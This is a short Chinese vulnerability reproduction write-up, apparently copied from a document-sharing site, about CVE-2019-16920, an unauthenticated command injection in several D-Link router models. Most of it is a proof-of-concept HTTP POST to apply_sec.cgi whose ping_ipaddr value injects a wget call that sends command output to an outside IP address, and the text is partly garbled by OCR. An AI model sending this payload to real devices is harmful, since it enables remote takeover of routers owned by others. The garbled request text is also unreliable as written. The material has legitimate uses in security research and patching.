《(CVE-2019-16920)D-Link rce.docx》由会员分享,可在线阅读,更多相关《(CVE-2019-16920)D-Link rce.docx(1页珍藏版)》请在第壹文秘上搜索。
1、(CVE-2019-16920) D-Link rce一、漏洞简介D-Link设备中出现未经身份验证的命令注入漏洞(FG-VD-19-117CVE2019 16920),该漏洞可造成远程代码执行。二、漏洞影响DIR-655 , DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, DIR-825 等三、复现过程poc攻击者可以利用该漏洞将任意字符串发送到“PingTest”网关接口来实现命 令注入。POST /apply_sec.cgi HTTP/1.1Host: 192.168.232.128
2、User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Geck o20100101 Firefox/69.0Accept: texthtml,applicationxhtml+xmljapplicationxmljq=0.9,*jq=0.8 Accept-Language: vi-VN,vijq=0.8,en-US;q=0.5,enjq=0.3Accept-Encoding: gzip, deflateContent-Type: application/X-WWW-form-urIencodedContent-Le
3、ngth: 131Connection: closeReferer: http:/192.168.232.128/login_pic. aspCookie: uid=1234123Upgrade-Insecure-Requests: 1html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1% 0awgt%20-P%25tmp%20ht3p:/45.76.148.31:4321/?$(echo1234)“该漏洞始于一次错误的身份验证过程。当我们要进入管理页面时,需要执行登录 操作。此时,我们会对apply_sec.cgi页面发出POST请求,其中包含一个操作 ping_testo研究后发现,我们可通过参数Ping_ipaddr执行命令注入。虽然响应 是返向登录页面,但操作PingleSt仍然执行了,我们通过参数ping_ipaddr注 入的命令echo 1234成功执行,并将结果发送回我们的服务器。”image